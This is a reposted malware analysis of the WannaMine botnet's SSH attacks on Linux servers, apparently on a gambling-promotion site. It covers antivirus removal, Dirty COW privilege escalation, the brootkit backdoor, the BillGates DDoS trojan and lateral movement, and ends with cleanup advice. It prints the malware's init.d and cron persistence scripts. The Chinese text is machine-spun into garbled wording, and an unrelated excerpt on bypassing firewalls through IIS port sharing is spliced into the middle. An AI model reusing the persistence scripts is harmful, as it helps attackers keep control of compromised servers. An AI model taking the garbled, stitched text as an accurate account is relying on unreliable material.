WannaMine挖矿木马再活泼,14万台linux体系受进击,广东省为重灾区 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

WannaMine挖矿木马再活泼,14万台linux体系受进击,广东省为重灾区

申博_安全防护 申博 54次浏览 未收录 0个评论

一、背景

腾讯平安专家在为某企业客户举行例行平安巡检过程当中,发明客户布置的腾讯御界高等要挟检测体系涌现了SSH效劳沦陷感知信息。

在征得客户赞同后对客户机械举行长途取证,并连系御界的症结日记举行剖析,我们发明这是一同针对SSH效劳器弱口令爆破进击事宜,因为发明实时,工程师实时辅佐客户举行断绝及杀毒,并未构成丧失。

腾讯平安御见要挟情报中心睁开事宜调查,效果发明,这是由大型挖矿僵尸网络WannaMine提议的进击事宜:进击者应用SSH弱口令爆破胜利后会植入shell后门以及brootkit后门顺序,并经由过程SSH在内网横向流传,受益机械吸收长途指令装置(包括但不限于)挖矿木马、DDoS进击模块。

SSH代表平安外壳(Secure Shell),它现在是经由过程互联网接见网络装备和效劳器的主要协定之一。SSH主要用在一切盛行的操纵体系上,比方Unix、Solaris、Red-Hat Linux、CentOS和Ubuntu等。SSH默许状况运用端口号22,我们经由过程zoomeye查找开放22端口的装备,发明环球有凌驾1亿台装备开放了该端口,这意味着凌驾1亿台装备有被爆破进击的能够。

依据腾讯平安御见要挟情报中心的监测数据,WannaMine自2019年6月最先在国内显现新的快速增长趋向,现在已影响近14万台装备。

病毒感染区域散布前三名离别为:广东(20.3%)、江苏(7.7%)、浙江(7%)。

WannaMine病毒受益者散布

受WannaMine病毒影响的主要行业为工业企业(34.11%),其次为互联网企业(10.85%)和教诲行业(10.08%)。

WannaMine挖矿木马影响的主要行业

二、详细剖析
剖析发明,此次进击事宜中WannaMine最先将进击目标转向Linux体系,其行动主要具有以下特性:
1、会猎取被感染机械的SSH衔接纪录,从而进击该机械登录过的一切长途效劳器,以到达横向流传的目标;

2、检测中招机械上的“平安狗”、“安骑士”、“云锁”、“悬镜卫士”等12种效劳器防护软件,针对每一款软件举行退出及删除;

3、将保卫剧本代码增加至Linux启动项、定时使命,以到达耐久化;末了消灭挖矿合作对手,开启挖矿,并尝试应用Linux内核提权破绽CVE-2016-5195猎取体系Root权限;

4、植入Linux平台DDoS木马“BillGates”,该木马伪装成Linux体系东西“ps”,“lsof”和”netstat”等举行隐蔽,具有长途shell、作为客户端或效劳器运转的功用。“BillGates”吸收长途指令,对目标举行多种范例的DDoS进击。

WannaMine进击Linux体系

Shell
在经由过程破绽进击、爆破进击进入Linux体系后,病毒植入“Shell”剧本。剧本起首举行变量声明,指定后续须要用到的网络地点,文件途径等信息。

指定木马长途地点和目次、以及文件hash:
· temp_remote_host: 长途地点
· sodd_info_arr: DDoS木马
· tiktoor_info_arr: brootkit后门
· pxe_info_arr: CVE-2016-5195内核提权
指定木马实行途径、历程名及相干参数:
· 下载文件保留目次:DownloadPath=”/usr/lib/…”
· Shell历程名:ShellProceName=”diskmanagerd”
· DDoS木马历程名:soddProceName=”kacpi_notify”
· Shell历程权限:shell_privilege=1
· 体系范例:OsType=1
· 校验要领:verify_method=”md5sum”
· Shell参数:ShellArg=$1
· 当前版本:Ver=1.0

匹敌杀软

经由过程ls -l /etc/init.d/$servicename检测以下防护效劳:
· Safedog:平安狗
· aegis:安骑士
· yunsuo:云锁
· clamd:ClamAV
· avast:Avast
· avgd:AVG
· cmdavd:COMODO Antivirus
· cmdmgd:COMODO Antivirus
· drweb-configd:Dr.Web
· drweb-spider-kmod:Dr.Web
· esets:ESET NOD32 Antivirus
· xmirrord:悬镜效劳器卫士

然后针对每一款防护软件举行清算,包括住手效劳、杀死历程、删除文件、卸载软件等操纵。

function BasicInit(){}实行基本的初始化。
运用ping敕令搜检remote_host中的第一个地点是不是能衔接,假如不能则运用第二个;
经由过程检察$UID、$EUID的值来肯定当前的权限,高权限则设置下载目次为”/home/$USER/…”,低权限设置为”/usr/lib/…”;

搜检当前是不是具有md5校验功用;搜检当前体系属于CentOS/Ubantu/Debian中的哪一种,默许为CentOS。

内核提权
function RunInBack(){}搜检shell是不是运用/sbin/init运转,假如不是则将剧本挪动到之前具有写入权限(Rwx)的文件夹,其称号为“diskmanagerd”(称号在$ShellProceName称号变量中指定),然后将剧本尝试运用nohup实用顺序从新运转,或在未装置nohup时仅在背景运转。

function GetRootAccess(){}应用破绽CVE-2016-5195猎取体系Root权限。
参考链接:

https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails

CVE-2016-5195(脏牛破绽)是因为Linux内核的内存子体系在处置惩罚写入时复制(copy-on-write, COW)时发生了合作前提(race condition),进击者应用此破绽对只读内存映照举行写接见,从而可获得Linux装备的root权限。

消灭挖矿竞品

function WorkProc(){}检测并完毕挖矿相干的历程。

耐久化进击

利用IIS的端口共享功能绕过防火墙

0x00 前言 我最近在思考这样一个问题: Windows服务器开启了IIS服务,防火墙仅允许80或443端口进行通信,那么如何在不使用webshell的前提下,实现对该服务器的远程管理?更进一步,如果只有低权限,有没有办法呢? 0x01 简介 本文将要介绍以下内容: · HTTP.sys和端口共享 · WinRM服务 · HTTP Server API · 针对80和443端口的利用方法 · 针对高权限和低权限的利用方法 · 检测方法 0x02 基本概念 1.HTTP.sys和端口共享 微软在Windows 2003 Server加入了内核驱动程序(Http.sys),用于侦听http流量并根据URL进行处理,允许任意用户进程共享专用于HTTP流量的TCP端口。 也就是说,通

function SetStartup(){}中离别增加保卫顺序到Linux启动项目次、定时使命,以到达重复实行shell的目标。

保卫剧本1:

guarderText="#!/bin/sh
# chkconfig: 12345 90 90
# description: irqbalence
### BEGIN INIT INFO
# Provides:     irqbalence
# Required-Start:
# Required-Stop:
# Default-Start:    1 2 3 4 5
# Default-Stop:
# Short-Description:    irqbalence
### END INIT INFO
case \$1 in
start)
    /usr/bin/irqbalence
    ;;
stop)
    ;;
*)
    /usr/bin/irqbalence
    ;;
esac"

将guarderText内容写入启动目次/etc/rc.d/init.d目次下,从而在启动时实行。

WannaMine挖矿木马再活泼,14万台linux体系受进击,广东省为重灾区

保卫剧本2:

guarderText2="#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in \`cat /proc/net/dev|grep :|awk -F: {'print \$1'}\`; do ifconfig \$i up& done
if [ ! -f \"$DownloadPath/$ShellProceName\" ]; then
    \cp -rf /lib/libterminfo.so $DownloadPath/httpdinfo
fi
test=0
for i in /proc/*
do
    if [ -d \"\$i\" ] && [ \"\$i\" != \"/proc/\$\$\" ];then
        if [ -f \"\$i/exe\" ]; then
            temp=\`ls -l \$i | grep exe | grep /bin/bash\`
            if [ \"\$temp\" != \"\" ]; then
                temp=\`cat \$i/cmdline\`
                result=\$(echo \"\$temp\" | grep \"$ShellProceName\")
                if [ \"\$result\" != \"\" ]; then
                    test=1
                    break
                fi
            fi
        fi
    fi
done
if [ \"\$test\" = 0 ]; then
    (exec $DownloadPath/httpdinfo &> /dev/null &)
fi"

将guarderText2写入etc/cron.hourly/gcc4lef.sh,并装置为crontab定时使命运转

WannaMine挖矿木马再活泼,14万台linux体系受进击,广东省为重灾区

brootkit后门

function rootkit(){}装置brootkit后门(github: https://github.com/cloudsec/brootkit),该后门具有具有偷取root用户暗码、隐蔽文件和目次、隐蔽历程、隐蔽网络衔接、反连后门、多线程端口扫描、HTTP下载、多线程SSH爆破等功用。

横向挪动

function Dandelion(){}从种种泉源(用户汗青纪录)网络有关当前用户之前经由过程SSH衔接的一切长途效劳器信息,尝试衔接到这些主机并感染它们,以便将本身流传到更多的体系。

DDoS木马
function CheckUpdate(){}搜检木马最新版本,并从效劳器下载更新

WannaMine挖矿木马再活泼,14万台linux体系受进击,广东省为重灾区

function Guard(){}中下载DDoS病毒”BillGates”。

顺次运用4中下载要领尝试下载(“wget” “curl” “python” “tcp”)。

下载完成后后运用md5sum盘算文件md5并举行校验,考证md5值是不是为6a971a24a418ce99e9a0cd65ba14078d/4e117357b8a5bf51aaba6e939cace26b。

WannaMine挖矿木马再活泼,14万台linux体系受进击,广东省为重灾区

BillGates(作者疑似比尔盖兹的粉丝)
shell下载的文件为功用庞杂DDoS木马BillGates,其得名于其在变量函数的定名中,大批运用“Gates”和“Bill”。另外,木马还具有伪装成Linux体系东西’ps’,’lsof’和’netstat’等举行隐蔽本身、长途shell、作为客户端或效劳器运转等特性。

木马初期大规模扫描和应用破绽感染Elasticsearch效劳器(ElasticSearch是一个基于Lucene的搜刮效劳器,是最受迎接的企业搜刮引擎)从而构成壮大的僵尸网络。

木马起首竖立一个包括文件名和途径的全局变量“看管”文件。看管文件代表开端装置的BillGates处于运转状况下。接下来经由过程CSysTool::CheckGatesType来肯定当前处于哪一种运转状况下,推断返回的全局变量g_iGatesType标识0至3共四种状况:

0代表当前历程的映像相符监控文件名和途径
1代表当前历程的映像不相符监控文件名和途径,而且不属于其他任何范例
2代表当前历程的映像相符/usr/bin/
3代表当前历程的映像相符以下体系东西之一

/bin/netstat
/bin/lsof
/bin/ps
/bin/ss
/usr/bin/netstat
/usr/bin/lsof
/usr/bin/ps
/usr/bin/ss
/usr/sbin/netstat
/usr/sbin/lsof
/usr/sbin/ps
/usr/sbin/ss

婚配到每一个标识后都以差别的目标运转,如许使得BillGates作为单个实体能够运作四种差别的形式,实行多个奇特的功用,从而其成为一个庞杂的的多功用木马。
形式0
BillGates作为感染监控器,经由过程挪用MainMonitor最先。在这类形式下的使命是不停看管运动历程列表以肯定是不是生成了由形式1(称为Host形式)发生的历程正在运转。
形式1
BillGates的Host形式。当main函数中挪用MainBeikong最先实行。Host形式的初始化阶段完成后,MainBeikong经由过程挪用MainProcess完毕,MainProcess是BillGates在Host或Backdoor形式下运转时的中心功用。MainProcess起首初始化五个全局对象:

WannaMine挖矿木马再活泼,14万台linux体系受进击,广东省为重灾区

Host或backdoor形式下的BillGates支撑7种差别的治理掌握敕令:

个中DDoS进击范例以下:

形式2
Backdoor形式。main函数中挪用MainBackdoor进入该形式。运用BillGates文件替代Linux体系二进制文件,然后MainBackdoor挪用MainProcess,在这以后实行代码与Host形式的行动雷同。
形式3
公共设施。该形式经由过程挪用MainSystool 最先,BillGates作为Linux体系二进制文件的代办运转,并从体系东西的输出中删除本身的陈迹。

三、总结
WannaMine进击代码显现高度体系化、定制化的特性,从初次涌现以后,其载荷托管IP地点会在没一次主要更新以后举行切换。而视察汗青托管IP与IP剖析到的域名能够发明,跨时代、跨版本的进击代码又存在运用雷同的托管域名(标红域名)的状况,因而推想该病毒团伙存在在向其他团伙供应进击兵器的能够。

从进击对象与手段上来看,WannaMine不停拓宽其进击覆盖面,从最初的应用“永久之蓝”破绽、Powershell进击Windows体系,到厥后应用各种Web破绽(Weblogic、PHPMyAdmin、Drupal)进击Windows上搭建的效劳器,到末了经由过程MsSQL爆破进击SQL效劳器,以及SSH爆破进击Linux效劳器。

在木马范例上,最先以植入挖矿和远控范例木马为主,厥后逐步到场DDoS木马(包括Windows平台和Linux平台),其目标在于组建巨大的挖矿僵尸网络以及DDoS僵尸网络,使该病毒团伙具有不停更新、内网横向挪动、耐久化赢利的才能。

四、平安发起
1、实时为体系和应用软件打补丁,封闭不必要的端口和效劳;
2、运用高强度的体系登陆暗码、SSH登陆暗码、MsSQL数据库暗码等;
3、装置平安软件并坚持平安软件一般开启,本案例申明,Linux体系被病毒入侵的事宜愈来愈罕见;
4、Linux效劳器手动清算计划
删除启动项
/etc/rc.d/init.d/diskmanagerd
/etc/rcS.d/S90diskmanagerd
删除定时使命
*/3 * * * * root /etc/cron.hourly/gcc4lef.sh
删除文件
/tmp/…/brootkit.sh
/tmp/…/install.sh
/tmp/…/just4root
/tmp/…/pxe
封闭历程
/usr/lib/diskmanagerd
/home/$USER/diskmanagerd
/usr/lib/kacpi_notify
/home/$USER/kacpi_notify
5、修复破绽(Dirty COW:CVE-2016-5195)
各操纵体系供应商下载Linux kernel 4.8.3、Linux kernel 4.7.9和Linux kernel 4.4.26 LTS,为用户供应稳定版渠道更新。
软件开发人员能够经由过程
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619

从新编译Linux修复此破绽。
6、ssh非交互体式格局登录到长途效劳器时,设置主机公钥确认StrictHostKeyChecking的值为ask或yes,防止汗青SSH登录纪录被病毒应用,构成内网散布。
(注:StrictHostKeyChecking=no 最不平安的级别,衔接server的key在当地不存在,就自动增加到文件中(默许是known_hosts)。

StrictHostKeyChecking=ask 默许的级别,假如衔接和key不婚配,给出提醒,并谢绝登录。

StrictHostKeyChecking=yes最平安的级别,假如衔接与key不婚配,就谢绝衔接,不会提醒详细信息。)

原文地点: https://www.4hou.com/system/19849.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明WannaMine挖矿木马再活泼,14万台linux体系受进击,广东省为重灾区
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址